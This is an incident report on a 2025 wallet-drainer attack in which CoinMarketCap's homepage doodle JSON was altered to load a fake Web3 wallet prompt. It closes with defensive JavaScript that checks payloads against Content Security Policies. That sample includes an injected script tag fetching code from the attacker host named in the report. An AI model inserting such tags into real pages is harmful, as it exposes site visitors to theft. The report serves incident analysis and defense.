A cyber-attack on CoinMarketCap exposed users to a fake Web3 wallet prompt, draining $43,266 from wallets
# Incident Report: CoinMarketCap Web3 Wallet Drainer Attack
## Executive Summary
On June 20, 2025, CoinMarketCap experienced a security incident in which the JSON payload behind the homepage "doodle" image was modified so that the page loaded malicious JavaScript from an external host. The script displayed a fake Web3 wallet-connection prompt; users who connected and approved the requested transactions had approximately $43,000 in cryptocurrency drained from their wallets before the content was identified and removed the same evening.
## Incident Details
- **Discovery Date:** Friday evening, June 20, 2025
- **Incident Date:** On or around June 20, 2025
- **Affected Organization:** CoinMarketCap
- **Sector:** Cryptocurrency Data Tracking / DeFi Adjacent
- **Geography:** Global (as CoinMarketCap is a worldwide service)
## Timeline of Events
### Initial Access
- **Date/Time:** Prior to June 20, 2025 (Injected payload)
- **Vector:** Compromised third-party API call backing the homepage "doodle" image feature.
- **Details:** Attackers modified the JSON payload returned by that API so that rendering the doodle caused the page to load JavaScript from an external host, `static.cdnkit[.]io`, rather than from CoinMarketCap's own assets.
### Lateral Movement
- Not explicitly detailed; the attack focused on immediate client-side exploitation upon page load/interaction rather than deep network compromise.
### Data Exfiltration/Impact
- **Details:** The malicious script displayed a fake Web3 connection prompt. Once users connected a wallet and approved the transactions the prompt requested, the script used those approvals to transfer assets out of the connected wallets.
- **Loss:** Approximately $43,000 stolen from affected users' wallets.
### Detection & Response
- **How it was discovered:** The report records only that the injected content was identified on Friday evening, June 20, 2025; the detection source (internal monitoring or external reports) is not stated.
- **Response actions taken:** CoinMarketCap removed the problematic content (the compromised doodle/API reference), identified the root cause (the modified JSON payload), and implemented measures to isolate and mitigate the issue.
## Attack Methodology
- **Initial Access:** Injection of malicious JavaScript via a compromised API linked to a homepage element ("doodle" image).
- **Persistence:** None on user devices; the exploit executed on page load/user interaction. Server-side, the modified JSON payload itself persisted and was served to every visitor until it was removed.
- **Privilege Escalation:** Not applicable; reliance on user trust for wallet interaction.
- **Defense Evasion:** Loading the payload from a separate, legitimate-looking script host (`static.cdnkit[.]io`) rather than embedding it in the modified JSON, which keeps the visible change small and sidesteps filters that inspect only the primary domain's own assets.
- **Credential Access:** No seed phrases or private keys were harvested; the fake prompt induced users to connect a wallet and sign fraudulent transactions/approvals, which gave the attacker the signing authority needed to move funds.
- **Discovery:** Not applicable; no attacker reconnaissance inside CoinMarketCap systems is described.
- **Lateral Movement:** Not applicable.
- **Collection:** Connected wallet addresses and balances were targeted.
- **Exfiltration:** Cryptocurrency assets were directly transferred out of user wallets to attacker-controlled addresses.
- **Impact:** Financial loss for users who interacted with the prompt.
## Impact Assessment
- **Financial:** Approximately $43,000 stolen from users' wallets.
- **Data Breach:** No exposure of personal identifying information (PII) is reported; the compromise was of wallet signing authority and funds rather than of CoinMarketCap account data.
- **Operational:** Brief period of exposure; systems were fully operational shortly after mitigation.
- **Reputational:** Negative publicity for CoinMarketCap regarding security practices surrounding third-party integrations.
## Indicators of Compromise
- **Network indicators (Defanged):** Requests to `static.cdnkit[.]io` during the incident window, in particular script loads originating from the CoinMarketCap homepage.
- **File indicators:** A doodle JSON payload that references an external script host; no hash or filename for the JavaScript itself is published in this report.
- **Behavioral indicators:** Display of an unexpected, official-looking Web3 connection prompt on the CoinMarketCap homepage outside of intended functionality.
## Response Actions
- **Containment measures:** Immediate removal of the problematic content (the compromised doodle/API reference).
- **Eradication steps:** Identified and shut down the mechanism allowing the malicious payload injection (the compromised third-party API link/JSON payload).
- **Recovery actions:** Verified that all systems were fully operational and secure afterward.
## Lessons Learned
- The reliance on external/third-party API calls for core visual elements (like a "doodle") introduces significant supply chain risk if validation is insufficient.
- Wallet drainer attacks remain a critical threat in the Web3 space, relying heavily on user complacency surrounding connection prompts.
## Recommendations
- Deploy a strict Content Security Policy with an explicit `script-src` allowlist of the origins that legitimately serve scripts, so that a payload-injected reference to an unlisted host such as `static.cdnkit[.]io` is blocked by the browser; broad scheme sources like `https:` give no protection against this class of injection. Treat dynamically rendered elements as untrusted input and render them as data, not markup.
- Increase real-time monitoring and anomaly detection for changes originating from high-visibility components like homepage assets.
- Enhance user education regarding wallet security, emphasizing that legitimate services rarely request broad permissions via unexpected pop-ups, especially outside of dedicated wallet software interfaces.
- Review and audit all vendor/API integrations feeding dynamic content to the main website.
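The two controls that would have mattered here, validating the doodle payload before it reaches the page and enforcing a `script-src` allowlist, can be exercised together. The following is an added example, not CoinMarketCap's code: it extracts script URLs from a constructed doodle-style JSON payload and evaluates each against a CSP. The payload schema, the page origin `www.example.org`, the CDN `cdn.example.org` and the script path `loader.js` under `static.cdnkit.io` are assumptions for illustration.

```javascript
// Added example (not CoinMarketCap's code). Audits a doodle-style JSON payload
// for external script references and checks each against a CSP script-src.
// Origins, payload shape and the loader.js path are assumptions.

const PAGE_ORIGIN = "https://www.example.org"; // assumed page origin

// Constructed payload in the shape an API might return for a homepage doodle.
// The <script> tag pointing at static.cdnkit.io is the injected element.
const DOODLE_PAYLOAD = JSON.stringify({
  id: "doodle-constructed",
  image: "https://cdn.example.org/doodle.png",
  html: '<a href="/event"><img src="https://cdn.example.org/doodle.png"></a>' +
        '<script src="https://static.cdnkit.io/loader.js"></script>', // path assumed
});

// Walk every string value in the JSON and collect script URLs: explicit
// <script src=...> tags and bare string values that are .js URLs.
function extractScriptUrls(payloadJson) {
  const urls = new Set();
  const tagRe = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const visit = (v) => {
    if (typeof v === "string") {
      for (const m of v.matchAll(tagRe)) urls.add(m[1]);
      if (/^https?:\/\/\S+\.js(\?.*)?$/i.test(v)) urls.add(v);
    } else if (Array.isArray(v)) v.forEach(visit);
    else if (v && typeof v === "object") Object.values(v).forEach(visit);
  };
  visit(JSON.parse(payloadJson));
  return [...urls];
}

// Return the source-expression list of a CSP directive, or null if absent.
function directiveSources(csp, name) {
  for (const part of csp.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === name) return tokens.slice(1);
  }
  return null;
}

// Does one CSP source expression permit loading `url`? Covers 'none', 'self',
// scheme-source (https:), and host-source with optional *. wildcard, port and
// path prefix. Nonces/hashes do not authorize external fetches, so they are
// ignored. A host-source without a scheme is treated as matching http or https
// (a simplification of the spec's "same scheme as the page" rule).
function sourceMatches(src, url, pageOrigin) {
  const u = new URL(url);
  const page = new URL(pageOrigin);
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return u.origin === page.origin;
  if (s.startsWith("'")) return false; // 'unsafe-inline', nonces, hashes
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return u.protocol === s; // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/[^?#]*)?$/.exec(s);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const schemeOk = scheme ? u.protocol === scheme + ":" : ["http:", "https:"].includes(u.protocol);
  if (!schemeOk) return false;
  if (host === "*") { /* any host */ }
  else if (host.startsWith("*.")) { if (!u.hostname.endsWith(host.slice(1))) return false; }
  else if (u.hostname !== host) return false;
  const effectivePort = u.port || (u.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && effectivePort !== port) return false;
  if (path && !u.pathname.startsWith(path)) return false;
  return true;
}

// script-src falls back to default-src; with neither directive everything loads.
function isScriptAllowed(csp, url, pageOrigin = PAGE_ORIGIN) {
  const sources = directiveSources(csp, "script-src") ?? directiveSources(csp, "default-src");
  if (sources === null) return true;
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Evaluate every script URL found in the payload against a policy.
function auditPayload(payloadJson, csp, pageOrigin = PAGE_ORIGIN) {
  return extractScriptUrls(payloadJson).map((url) => ({
    url,
    allowed: isScriptAllowed(csp, url, pageOrigin),
  }));
}

// Weak policy: any HTTPS host may serve scripts, so the injected loader runs.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";
// Tightened policy: explicit allowlist of the CDN that serves homepage assets.
const STRICT_CSP = "default-src 'self'; script-src 'self' https://cdn.example.org";

for (const [name, csp] of [["weak", WEAK_CSP], ["strict", STRICT_CSP]]) {
  for (const r of auditPayload(DOODLE_PAYLOAD, csp)) {
    console.log(`${name}: ${r.url} -> ${r.allowed ? "ALLOWED" : "blocked"}`);
  }
}
```

Run with Node. Under the weak policy the `https:` scheme source lets `static.cdnkit.io` through; under the strict allowlist only `'self'` and the named CDN can serve scripts, so the injected reference is blocked in the browser regardless of what the API returned. The same `extractScriptUrls` pass is what a server-side validation step should run on the doodle payload before publishing it: any script reference outside the allowlist is a reason to reject the payload, not just to rely on the browser.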